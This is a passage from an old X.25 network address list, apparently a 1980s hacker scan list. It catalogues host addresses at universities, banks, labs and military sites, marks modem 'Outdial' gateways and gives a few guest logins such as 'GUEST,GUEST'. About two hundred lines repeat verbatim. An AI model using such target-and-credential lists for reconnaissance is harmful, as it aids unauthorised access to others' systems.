  2584. I 0262 456 340 40136               Nadler-Werke GmbH
  2585. A 0262 456 410 30021               HRZ-Giessen
  2586. I 0262 456 410 40142               Aachener + Muenchener Versicherung
  2587. A 0262 456 410 90040               HRZ Giessen (CDCNET-X.25)
  2588. I 0262 456 410 90828               Ernaehrungswissenschaften
  2589. I 0262 456 441 90335               Leerwe GmbH
  2590. I 0262 456 615 142804              GMD, Darmstadt
  2591. A 0262 456 673 13330               Geonet 1 (ex IMCA)
  2592. A 0262 456 673 13340               Geonet 3
  2593. I 0262 456 673 30070               IMCA-Mailbox, Solmser Str. 16, D-6419
  2594.                                    Haunetal-Staerklos
  2595. I 0262 456 721 40305               Alfa Metalcraft Corp.
  2596. I 0262 456 810 40010               Teleprint Saarbrueckener Zeitung
  2597. I 0262 456 810 40071               Nadler-Werke GmbH
  2598. I 0262 456 810 40076    SAARBRU    Univ of Saarbruecken (Saarland RZ)
  2599. A 0262 456 900 10174               Beilstein Gmelin RZ (COMDOS ?)
  2600. O 0262 456 900 10552               FIZ-Technik
  2601. O 0262 456 900 30040               Nixdorf Computer
  2602. A 0262 456 900 40076               Autonet
  2603. D 0262 456 900 40106               Nixdorf
  2604. I 0262 456 900 40505               AEG-Telefunken
  2605.   0262 456 900 40506               AEG-Telefunken
  2606. A 0262 456 900 90125
  2607. I 0262 456 900 90506               Nixdorf
  2608. I 0262 456 900 9308                SYNTAX
  2609. I 0262 457 010 40025               ?
  2610. A 0262 457 071 40266               Zentrum fuer Datenverarbeitung
  2611.   0262 457 071 40529               Zentrale Verw.
  2612.   0262 457 071 90182               ADW-Wirtschaftsberatung
  2613. D 0262 457 071 90249               Bibliothek
  2614. D 0262 457 110 10023               Hohenheim Bibliothek
  2615. D 0262 457 110 211                 Rechenzentrum
  2616. Dr0262 457 110 40028
  2617. Dr0262 457 110 40035               Primenet !! No CTRL-P clr !!
  2618. B 0262 457 110 40124               Stahl EDV-Service
  2619.   0262 457 110 40129               Allg.Rentenanstalt
  2620.   0262 457 110 40147               MAHU Verlag
  2621. D 0262 457 110 90059               Bibliothek
  2622.   0262 457 110 90103               Data General
  2623.   0262 457 110 90246               Hohenheim DokumentationsSt.
  2624. D 0262 457 110 90316               RMI-Net
  2625.   0262 457 110 90557               Stahl EDV-Service
  2626. A 0262 457 110 90593               Unix, Informatik (ifistg)
  2627.   0262 457 141 90098               Aigner Buchhandlung
  2628. X 0262 457 210 40002               V750
  2629. Br0262 457 210 40025               Badenia
  2630.   0262 457 210 40031               IITB-Datenverarbeitung
  2631. D 0262 457 210 40135               Fraunhofer Institut
  2632. C 0262 457 210 40189               Uni Karlsruhe, RZ (until 10-APR-88)
  2633. X 0262 457 210 40248               Uni Karlsruhe, LINK (=NETONE?)
  2634. A 0262 457 210 42100               Uni Karlsruhe, IRAV2 (VAX 8200)
  2635. A 0262 457 210 42140               Uni Karlsruhe, RZ (since 11-APR-88)
  2636. D 0262 457 210 4303                Telematik
  2637. A 0262 457 247 40001               INKA  FIZ-Chemie 2 (German Centre for
  2638.                                    Tech.?)
  2639. A 0262 457 247 40141               INKA  FIZ-Chemie 1
  2640. A 0262 457 247 40211    CASGER     STN Internat. Karlsruhe
  2641. D 0262 457 310 90269               RZ Bereich OE
  2642.   0262 457 310 921                 RZ
  2643.   0262 457 351 40032               AFD-Arbeitsgruppe F.DV
  2644. A 0262 457 531 90008               Informationswissenschaften
  2645. D 0262 457 531 90094               RZ
  2646.   0262 457 552 90320               Alno-Moebel
  2647. D 0262 457 610 300                 Uni Freiburg, 9600bps
  2648. D 0262 457 610 370                 Uni Freiburg, Sperry Univac
  2649. D 0262 457 610 40079               Albert Ludwig, Uni-Bibliothek
  2650.   0262 457 610 40166               AEG-Telefunken
  2651.   0262 457 610 40306               Alpha-Buch GmbH
  2652. B 0262 457 610 420                 Uni Freiburg, 4800bps
  2653. B 0262 457 610 480                 Uni Freiburg, Sperry Univac
  2654. X 0262 457 610 520                 Uni Freiburg, Uni Bibliothek
  2655.   0262 457 641 40265               Anders Ernst
  2656.   0262 457 721 40071               Kienzle Computer
  2657.   0262 457 721 40072               Kienzle Computer
  2658.   0262 457 721 40171               Kienzle Computer
  2659.   0262 457 721 90004               Kienzle Computer
  2660.   0262 457 721 90226               Kienzle Computer
  2661.   0262 457 810 40222               Dietrich Georg GmbH
  2662. B 0262 458 151 40114               Kejo GmbH (Josef Keller)
  2663. D 0262 458 210 40114               Bibliothek
  2664.   0262 458 210 40120               NCR
  2665.   0262 458 510 30236               Passau RZ
  2666. D 0262 458 710 40171               Transfer Data Test GmbH
  2667.   0310 600 021 0                   Procter and Gamble
  2668.   0310 600 022 6                   Anistics
  2669.   0310 600 022 6                   Interactive Market Systems (Anistics)
  2670.   0310 600 023 2                   Scientific Timesharing
  2671.   0310 600 024 2                   Timesharing Resources
  2672.   0310 600 025 2                   Computer Science Corporation
  2673.   0310 600 025 5                   Timesharing Associates
  2674.   0310 600 027 6                   Management Decision Systems Inc
  2675.   0310 600 028 8                   SRI
  2676.   0310 600 028 8                   SRI San Francisco (UNIX)
  2677.   0310 600 028 8                   Stanford Research Institute (SRI)
  2678.   0310 600 030 3                   Scientific Timesharing
  2679.   0310 600 030 7                   Infomedia Corporation
  2680.   0310 600 032 3                   TRW Defence & Space Systems Group
  2681.   0310 600 040 1                   TMCS Public Network
  2682.   0310 600 043 2                   Interactive Market Systems
  2683.   0310 600 046 6                   Bibliographic Retrieval Services
  2684. B 0310 600 058 1                   BRS
  2685.   0310 600 063 3                   Public TYMNET/TRWNET Interlink
  2686.   0310 600 079 3                   J&J Host
  2687. B 0310 600 105 3
  2688.   0310 600 133 0                   MULTICS, HVN 862-3642
  2689.   0310 600 140 0                   TMCS Public Network
  2690. B 0310 600 150 9                   Orbit (SDC)
  2691. B 0310 600 157 878                 BIX
  2692. D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
  2693. A 0310 600 166 3                   People Link
  2694.   0310 600 181 9                   TMCS Public Network
  2695.   0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
  2696.   0310 600 186 4                   SUNGARDS Central Computer Facility Networks
  2697.   0310 600 189 2                   Primenet (certain hours)
  2698. B 0310 600 195 2                   VAX
  2699. B 0310 600 197 6                   Outdial NY
  2700. A 0310 600 197 7
  2701.   0310 600 209 5                   COMODEX Online System
  2702.   0310 600 209 8                   D & B
  2703.   0310 600 209 9                   D & B
  2704.   0310 600 210 0                   D & B
  2705.   0310 600 210 9                   TYMNET/15B (inter-link)
  2706. B 0310 600 220 7,OUT               Outdial
  2707.   0310 600 228 6                   Primenet TFGI
  2708.   0310 600 229 9                   CONSILIUM
  2709.   0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
  2710.                                    Livermore
  2711. B 0310 600 236 1                   Denver Oil&Gas
  2712.   0310 600 241                     Bank Of America
  2713.   0310 600 245 3                   Primenet
  2714. B 0310 600 254 5        SEISMO     Centre for Seismic Studies
  2715. B 0310 600 255                     Outdial NY
  2716. A 0310 600 262 3                   VAX/VMS (GUEST ???)
  2717. B 0310 600 262 3003                VTINET
  2718. B 0310 600 262 460                 SUMEX
  2719. B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
  2720. B 0310 600 266 400      SLAC       SLAC on Tymnet
  2721. B 0310 600 267 7                   The New York Times
  2722.   0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
  2723.                                    STRATUS-2
  2724.   0310 600 279 0                   VM/370
  2725.   0310 600 286 4                   RCA Semicustom
  2726. B 0310 600 302 70000               VTI NETONE
  2727.   0310 600 307 9                   VM/370
  2728.   0310 600 309 2                   TYMNET/Protected Access Service Sys.
  2729.                                    Inter-link
  2730.   0310 600 316 8                   VM/370
  2731.   0310 600 321 4                   VM/370
  2732.   0310 600 322 0                   VM/370
  2733.   0310 600 322 1                   VM/370
  2734.   0310 600 357 2                   NORTH AMERICA DATA CENTRE
  2735.   0310 600 360 4                   VM/370
  2736.   0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
  2737. A 0310 600 412 9                   ?
  2738. A 0310 600 413 1                   ?
  2739.   0310 600 413 7                   TSO, VM/370
  2740.   0310 600 416 300                 Oakridge, Tennessee
  2741.   0310 600 417 4                   VM/370
  2742.   0310 600 420 6                   MAINSTREAMS
  2743.   0310 600 423 500                 Oakridge, Tennessee
  2744. B 0310 600 430 5                   BIOVAX
  2745.   0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
  2746. A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
  2747. B 0310 600 455 5                   VAX
  2748.   0310 600 459 97
  2749.   0310 600 474 3                   TYMNET Info Service
  2750. X 0310 600 502 0                   Outdial Fairfax
  2751.   0310 600 522 9                   Uni.of Pencilvania School of Arts and
  2752.                                    Science
  2753.   0310 600 526 7                   CHANEL 01
  2754. X 0310 600 531 7                   Outdial St.Louis
  2755. B 0310 600 532 0                   DEC Soft. Serv.
  2756.   0310 600 556 9                   STRATUS/32
  2757.   0310 600 557 1                   STRATUS/32
  2758.   0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
  2759. B 0310 600 562 200      FNAL       Fermilab
  2760. B 0310 600 562 226                 Fermilab 2
  2761. B 0310 600 578 78                  BIX
  2762. B 0310 600 584 401                 Washington Post
  2763. B 0310 600 61           DIALOG1    Lockheed Info Systems
  2764.   0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
  2765.   0310 600 628 1                   EDCS
  2766.   0310 600 628 3                   EDCS
  2767.   0310 600 643 2                   EASYLINK
  2768.   0310 600 643 4                   EASYLINK
  2769.   0310 600 672 2                   International Network
  2770.   0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
  2771.   0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
  2772. X 0310 600 701 7                   Outdial NY
  2773.   0310 600 759 6                   (Host)  A - VM/370, B - VM/370
  2774. ? 0310 600 787                     Dallas
  2775.   0310 601 79                      Berkley Univ.
  2776.   0310 602 88                      Stanford Research Institute
  2777. B 0310 611 467                     Cas Online Sys.
  2778.   0310 614 67                      Ohio CAS (Chemical Abstracts Service)
  2779.   0310 617 001 38                  Multics
  2780.   0310 647 911 065                 BIX Lexington Data Service
  2781.   0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
  2782. B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
  2783.   0310 690 762 6                   Emery ADO
  2784.   0311 0                TELENET    USA - Telenet
  2785. B 0311 002 130 0039                ECLD
  2786.   0311 020 100 02000               Insco Systems
  2787.   0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
  2788.   0311 020 100 02300               American Information Services
  2789.   0311 020 100 02400               The Information Bank
  2790.   0311 020 100 02500               New Jersey Institute of Technology
  2791.   0311 020 100 02800               Olcott International Company
  2792.   0311 020 100 03700               Informatics Inc
  2793.   0311 020 100 169      MOUTON
  2794.   0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
  2795.   0311 020 101 59200               Scientific Process & Research Inc
  2796.   0311 020 200 02100               Scientific Timesharing
  2797.   0311 020 200 02200               Scientific Timesharing
  2798. X 0311 020 200 066                 Air Force
  2799. T 0311 020 200 099      ICIB       Information Council Incorporated B system
  2800.   0311 020 200 1        TELEMAIL   US Telemail facility
  2801. X 0311 020 200 10900    CIS        Chemical Information Systems
  2802. A 0311 020 200 115                 Outdial 300 bps (Area 202)
  2803. A 0311 020 200 116                 Outdial 1200 bps (Area 202)
  2804.   0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
  2805.                                    202)
  2806. B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
  2807.   0311 020 200 14175    TELEENQ    Telenet Enquiry Service
  2808.   0311 020 200 14175    TELEMAIL1  US Telemail facility
  2809.   0311 020 200 14275    TELENET    US Telenet
  2810.   0311 020 201 19500               Gallaude College Computer Centre
  2811.   0311 020 300 06400               NCSS Bureau
  2812.   0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
  2813.   0311 020 301 78900               Yale University Computer Centre
  2814.   0311 020 400 02900    WATERLO    University of Waterloo
  2815.   0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
  2816.   0311 021 200 02000               Bowne Timesharing
  2817.   0311 021 200 02500               Interactive Market Systems (Anistics)
  2818.   0311 021 200 02800               Burroughs Corp (NYC data centre)
  2819.   0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
  2820.   0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
  2821.   0311 021 200 14200               GT-Net Telemail
  2822. A 0311 021 200 315                 Outdial 300 bps (Area 212)
  2823. A 0311 021 200 316                 Outdial 1200 bps (Area 212)
  2824. D 0311 021 200 412                 Outdial 2400 bps (Area 212)
  2825. D 0311 021 200 41200               New York City Outdial (Area 212)
  2826.   0311 021 201 39200               Memorial Dose Distribution Computation
  2827.                                    Service
  2828.   0311 021 201 40600               MAV Systems (300 bps)
  2829.   0311 021 201 57800               IP Sharp Associates
  2830.   0311 021 201 58000               SDL International (1200 bps)
  2831.   0311 021 201 58500               SDL International (300 bps)
  2832.   0311 021 201 58800               DSL Systems Inc
  2833.   0311 021 201 59500               SDL International (1200 bps)
  2834.   0311 021 201 62000               Telestat System Inc
  2835.   0311 021 201 62700               Telestat Systems Inc
  2836.   0311 021 300 02200               Interactive Systems Corporation
  2837.   0311 021 300 02700               Mellonics Information Centre
  2838.   0311 021 300 029                 TRW Defence & Space Systems Group
  2839. B 0311 021 300 03300    ORBIT      Orbit
  2840.   0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
  2841.   0311 021 300 04400               SDC Search Service (1200 bps)
  2842. B 0311 021 300 039      USCAL2     Univ. of Southern California
  2843.   0311 021 300 04114    IHW        IHW
  2844.   0311 021 300 04700               University of Southern California
  2845. B 0311 021 300 048      USCAL1     University of Southern California
  2846. B 0311 021 300 170                 LRS Dialog 2
  2847. T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
  2848.   0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
  2849. B 0311 021 300 219      CALTECH    Caltech VAX 11/780
  2850.   0311 021 300 21908    CALTECH    Caltech VAX 11/780
  2851.   0311 021 300 21909    CALTECH2   Caltech VAX 11/780
  2852.   0311 021 300 412                 California Outdial 1200 bps (Area 213)
  2853. A 0311 021 300 413                 Outdial CA
  2854.   0311 021 300 668                 Adainfo
  2855.   0311 021 301 353      UCLA       UCLA, USA
  2856.   0311 021 301 40300               Marshall & Swift Publication
  2857.   0311 021 400 117                 Outdial 300 bps (Area 214)
  2858. A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
  2859.   0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
  2860.   0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
  2861. A 0311 021 600 020                 Outdial 300 bps (Area 216)
  2862. A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
  2863.   0311 021 700 021                 University of Illinois - Urbana
  2864.   0311 030 100 02000    NLM        National Library of Medicine
  2865. A 0311 030 100 02400               The Source
  2866. B 0311 030 100 038                 The Source (ID BSC131 SR3811)
  2867. B 0311 030 100 243                 ITT Dialcom
  2868.   0311 030 100 364                 Primesoft
  2869. A 0311 030 100 38                  The Source
  2870. B 0311 030 100 633                 Toxnet (NLM)
  2871.   0311 030 101 26500               Informatics Inc
  2872.   0311 030 300 02000               Computer Sharing Services
  2873.   0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
  2874.   0311 030 300 02300               Broker Services Inc
  2875.   0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
  2876.   0311 030 301 13100               EDI Computer Services
  2877.   0311 030 301 13200               EDI Computer Services
  2878.   0311 030 301 13300               Energy Enterprises
  2879.   0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
  2880.   0311 030 501 16300               Florida Computer Inc
  2881. D 0311 030 508 793                 Miami Outdial (Area 305) ?
  2882.   0311 031 200 02200               National Computer Network of Chicago
  2883.   0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
  2884.   0311 031 200 03100               Continental Bank
  2885.   0311 031 200 03200               Continental Bank
  2886.   0311 031 200 04900               American Hospital Supply Corporation
  2887.   0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
  2888.   0311 031 201 07300               Commodity Information Services
  2889.   0311 031 268 801      ADPUSA     ADP Network Services Ltd.
  2890.   0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
  2891.   0311 031 300 04000               ADP Network Services
  2892.   0311 031 300 06200               Merit International (MIT)
  2893.   0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
  2894.   0311 031 301 39800               Merit Computer
  2895.   0311 031 400 07200               Environmental DataNetwork Inc.
  2896.   0311 031 401 06500               McDonnel Douglas Automation (300 bps)
  2897.   0311 031 401 06600               McDonnel Douglas Automation (110 bps)
  2898.   0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
  2899.   0311 031 401 61000               McDonnel Douglas Automation (300 bps)
  2900.   0311 031 500 02000               Bibliographic Retrieval Services
  2901. A 0311 040 100 612                 Modemcity
  2902. A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
  2903. A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
  2904.   0311 040 800 245                 Bridge
  2905. B 0311 040 800 246                 SCF
  2906.   0311 041 201 4600                On-Line Systems Inc
  2907.   0311 041 400 02000               A.O. Smith Data Systems Divisions
  2908.   0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
  2909. B 0311 041 500 020                 LRS-Dialog 2
  2910. A 0311 041 500 02000    DIALOG     Lockheed Information Systems
  2911.   0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
  2912. B 0311 041 500 048                 LRS Dialog 2
  2913.   0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
  2914.   0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
  2915.   0311 041 500 117                 California Outdial 1200 bps (Area 415)
  2916. I 0311 041 500 210                 Outdial USA
  2917. A 0311 041 500 215                 Outdial (Area 415)
  2918. A 0311 041 500 217                 Outdial (Area 415)
  2919. A 0311 041 500 220                 Outdial 1200 bps (Area 415)
  2920.   0311 041 500 48000               Lockheed Information Systems (?)
  2921. B 0311 041 500 607                 BIONET
  2922. B 0311 041 500 609                 INTELLIGENETICS
  2923.   0311 041 501 23600               Hydrocomp Inc (300 bps)
  2924.   0311 041 501 23700               Hydrocomp Inc (1200 bps)
  2925.   0311 041 501 26800               ITEL Corp (300 bps)
  2926.   0311 041 501 26900               ITEL Corp (1200 bps)
  2927.   0311 041 501 59700               Stanford Library Centre for Inform
  2928.                                    Processing
  2929.   0311 041 501 59700               Standard Centre for Information Processing
  2930. O 0311 050 006 1                   Nuclear Research
  2931. A 0311 050 300 020                 Outdial 300 bps (Area 503)
  2932. A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
  2933. B 0311 050 500 060                 ICN (=LASL)
  2934.   0310 600 021 0                   Procter and Gamble
  2935.   0310 600 022 6                   Anistics
  2936.   0310 600 022 6                   Interactive Market Systems (Anistics)
  2937.   0310 600 023 2                   Scientific Timesharing
  2938.   0310 600 024 2                   Timesharing Resources
  2939.   0310 600 025 2                   Computer Science Corporation
  2940.   0310 600 025 5                   Timesharing Associates
  2941.   0310 600 027 6                   Management Decision Systems Inc
  2942.   0310 600 028 8                   SRI
  2943.   0310 600 028 8                   SRI San Francisco (UNIX)
  2944.   0310 600 028 8                   Stanford Research Institute (SRI)
  2945.   0310 600 030 3                   Scientific Timesharing
  2946.   0310 600 030 7                   Infomedia Corporation
  2947.   0310 600 032 3                   TRW Defence & Space Systems Group
  2948.   0310 600 040 1                   TMCS Public Network
  2949.   0310 600 043 2                   Interactive Market Systems
  2950.   0310 600 046 6                   Bibliographic Retrieval Services
  2951. B 0310 600 058 1                   BRS
  2952.   0310 600 063 3                   Public TYMNET/TRWNET Interlink
  2953.   0310 600 079 3                   J&J Host
  2954. B 0310 600 105 3
  2955.   0310 600 133 0                   MULTICS, HVN 862-3642
  2956.   0310 600 140 0                   TMCS Public Network
  2957. B 0310 600 150 9                   Orbit (SDC)
  2958. B 0310 600 157 878                 BIX
  2959. D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
  2960. A 0310 600 166 3                   People Link
  2961.   0310 600 181 9                   TMCS Public Network
  2962.   0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
  2963.   0310 600 186 4                   SUNGARDS Central Computer Facility Networks
  2964.   0310 600 189 2                   Primenet (certain hours)
  2965. B 0310 600 195 2                   VAX
  2966. B 0310 600 197 6                   Outdial NY
  2967. A 0310 600 197 7
  2968.   0310 600 209 5                   COMODEX Online System
  2969.   0310 600 209 8                   D & B
  2970.   0310 600 209 9                   D & B
  2971.   0310 600 210 0                   D & B
  2972.   0310 600 210 9                   TYMNET/15B (inter-link)
  2973. B 0310 600 220 7,OUT               Outdial
  2974.   0310 600 228 6                   Primenet TFGI
  2975.   0310 600 229 9                   CONSILIUM
  2976.   0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
  2977.                                    Livermore
  2978. B 0310 600 236 1                   Denver Oil&Gas
  2979.   0310 600 241                     Bank Of America
  2980.   0310 600 245 3                   Primenet
  2981. B 0310 600 254 5        SEISMO     Centre for Seismic Studies
  2982. B 0310 600 255                     Outdial NY
  2983. A 0310 600 262 3                   VAX/VMS (GUEST ???)
  2984. B 0310 600 262 3003                VTINET
  2985. B 0310 600 262 460                 SUMEX
  2986. B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
  2987. B 0310 600 266 400      SLAC       SLAC on Tymnet
  2988. B 0310 600 267 7                   The New York Times
  2989.   0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
  2990.                                    STRATUS-2
  2991.   0310 600 279 0                   VM/370
  2992.   0310 600 286 4                   RCA Semicustom
  2993. B 0310 600 302 70000               VTI NETONE
  2994.   0310 600 307 9                   VM/370
  2995.   0310 600 309 2                   TYMNET/Protected Access Service Sys.
  2996.                                    Inter-link
  2997.   0310 600 316 8                   VM/370
  2998.   0310 600 321 4                   VM/370
  2999.   0310 600 322 0                   VM/370
  3000.   0310 600 322 1                   VM/370
  3001.   0310 600 357 2                   NORTH AMERICA DATA CENTRE
  3002.   0310 600 360 4                   VM/370
  3003.   0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
  3004. A 0310 600 412 9                   ?
  3005. A 0310 600 413 1                   ?
  3006.   0310 600 413 7                   TSO, VM/370
  3007.   0310 600 416 300                 Oakridge, Tennessee
  3008.   0310 600 417 4                   VM/370
  3009.   0310 600 420 6                   MAINSTREAMS
  3010.   0310 600 423 500                 Oakridge, Tennessee
  3011. B 0310 600 430 5                   BIOVAX
  3012.   0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
  3013. A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
  3014. B 0310 600 455 5                   VAX
  3015.   0310 600 459 97
  3016.   0310 600 474 3                   TYMNET Info Service
  3017. X 0310 600 502 0                   Outdial Fairfax
  3018.   0310 600 522 9                   Uni.of Pencilvania School of Arts and
  3019.                                    Science
  3020.   0310 600 526 7                   CHANEL 01
  3021. X 0310 600 531 7                   Outdial St.Louis
  3022. B 0310 600 532 0                   DEC Soft. Serv.
  3023.   0310 600 556 9                   STRATUS/32
  3024.   0310 600 557 1                   STRATUS/32
  3025.   0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
  3026. B 0310 600 562 200      FNAL       Fermilab
  3027. B 0310 600 562 226                 Fermilab 2
  3028. B 0310 600 578 78                  BIX
  3029. B 0310 600 584 401                 Washington Post
  3030. B 0310 600 61           DIALOG1    Lockheed Info Systems
  3031.   0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
  3032.   0310 600 628 1                   EDCS
  3033.   0310 600 628 3                   EDCS
  3034.   0310 600 643 2                   EASYLINK
  3035.   0310 600 643 4                   EASYLINK
  3036.   0310 600 672 2                   International Network
  3037.   0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
  3038.   0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
  3039. X 0310 600 701 7                   Outdial NY
  3040.   0310 600 759 6                   (Host)  A - VM/370, B - VM/370
  3041. ? 0310 600 787                     Dallas
  3042.   0310 601 79                      Berkley Univ.
  3043.   0310 602 88                      Stanford Research Institute
  3044. B 0310 611 467                     Cas Online Sys.
  3045.   0310 614 67                      Ohio CAS (Chemical Abstracts Service)
  3046.   0310 617 001 38                  Multics
  3047.   0310 647 911 065                 BIX Lexington Data Service
  3048.   0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
  3049. B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
  3050.   0310 690 762 6                   Emery ADO
  3051.   0311 0                TELENET    USA - Telenet
  3052. B 0311 002 130 0039                ECLD
  3053.   0311 020 100 02000               Insco Systems
  3054.   0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
  3055.   0311 020 100 02300               American Information Services
  3056.   0311 020 100 02400               The Information Bank
  3057.   0311 020 100 02500               New Jersey Institute of Technology
  3058.   0311 020 100 02800               Olcott International Company
  3059.   0311 020 100 03700               Informatics Inc
  3060.   0311 020 100 169      MOUTON
  3061.   0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
  3062.   0311 020 101 59200               Scientific Process & Research Inc
  3063.   0311 020 200 02100               Scientific Timesharing
  3064.   0311 020 200 02200               Scientific Timesharing
  3065. X 0311 020 200 066                 Air Force
  3066. T 0311 020 200 099      ICIB       Information Council Incorporated B system
  3067.   0311 020 200 1        TELEMAIL   US Telemail facility
  3068. X 0311 020 200 10900    CIS        Chemical Information Systems
  3069. A 0311 020 200 115                 Outdial 300 bps (Area 202)
  3070. A 0311 020 200 116                 Outdial 1200 bps (Area 202)
  3071.   0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
  3072.                                    202)
  3073. B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
  3074.   0311 020 200 14175    TELEENQ    Telenet Enquiry Service
  3075.   0311 020 200 14175    TELEMAIL1  US Telemail facility
  3076.   0311 020 200 14275    TELENET    US Telenet
  3077.   0311 020 201 19500               Gallaude College Computer Centre
  3078.   0311 020 300 06400               NCSS Bureau
  3079.   0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
  3080.   0311 020 301 78900               Yale University Computer Centre
  3081.   0311 020 400 02900    WATERLO    University of Waterloo
  3082.   0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
  3083.   0311 021 200 02000               Bowne Timesharing
  3084.   0311 021 200 02500               Interactive Market Systems (Anistics)
  3085.   0311 021 200 02800               Burroughs Corp (NYC data centre)
  3086.   0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
  3087.   0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
  3088.   0311 021 200 14200               GT-Net Telemail
  3089. A 0311 021 200 315                 Outdial 300 bps (Area 212)
  3090. A 0311 021 200 316                 Outdial 1200 bps (Area 212)
  3091. D 0311 021 200 412                 Outdial 2400 bps (Area 212)
  3092. D 0311 021 200 41200               New York City Outdial (Area 212)
  3093.   0311 021 201 39200               Memorial Dose Distribution Computation
  3094.                                    Service
  3095.   0311 021 201 40600               MAV Systems (300 bps)
  3096.   0311 021 201 57800               IP Sharp Associates
  3097.   0311 021 201 58000               SDL International (1200 bps)
  3098.   0311 021 201 58500               SDL International (300 bps)
  3099.   0311 021 201 58800               DSL Systems Inc
  3100.   0311 021 201 59500               SDL International (1200 bps)
  3101.   0311 021 201 62000               Telestat System Inc
  3102.   0311 021 201 62700               Telestat Systems Inc
  3103.   0311 021 300 02200               Interactive Systems Corporation
  3104.   0311 021 300 02700               Mellonics Information Centre
  3105.   0311 021 300 029                 TRW Defence & Space Systems Group
  3106. B 0311 021 300 03300    ORBIT      Orbit
  3107.   0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
  3108.   0311 021 300 04400               SDC Search Service (1200 bps)
  3109. B 0311 021 300 039      USCAL2     Univ. of Southern California
  3110.   0311 021 300 04114    IHW        IHW
  3111.   0311 021 300 04700               University of Southern California
  3112. B 0311 021 300 048      USCAL1     University of Southern California
  3113. B 0311 021 300 170                 LRS Dialog 2
  3114. T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
  3115.   0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
  3116. B 0311 021 300 219      CALTECH    Caltech VAX 11/780
  3117.   0311 021 300 21908    CALTECH    Caltech VAX 11/780
  3118.   0311 021 300 21909    CALTECH2   Caltech VAX 11/780
  3119.   0311 021 300 412                 California Outdial 1200 bps (Area 213)
  3120. A 0311 021 300 413                 Outdial CA
  3121.   0311 021 300 668                 Adainfo
  3122.   0311 021 301 353      UCLA       UCLA, USA
  3123.   0311 021 301 40300               Marshall & Swift Publication
  3124.   0311 021 400 117                 Outdial 300 bps (Area 214)
  3125. A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
  3126.   0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
  3127.   0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
  3128. A 0311 021 600 020                 Outdial 300 bps (Area 216)
  3129. A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
  3130.   0311 021 700 021                 University of Illinois - Urbana
  3131.   0311 030 100 02000    NLM        National Library of Medicine
  3132. A 0311 030 100 02400               The Source
  3133. B 0311 030 100 038                 The Source (ID BSC131 SR3811)
  3134. B 0311 030 100 243                 ITT Dialcom
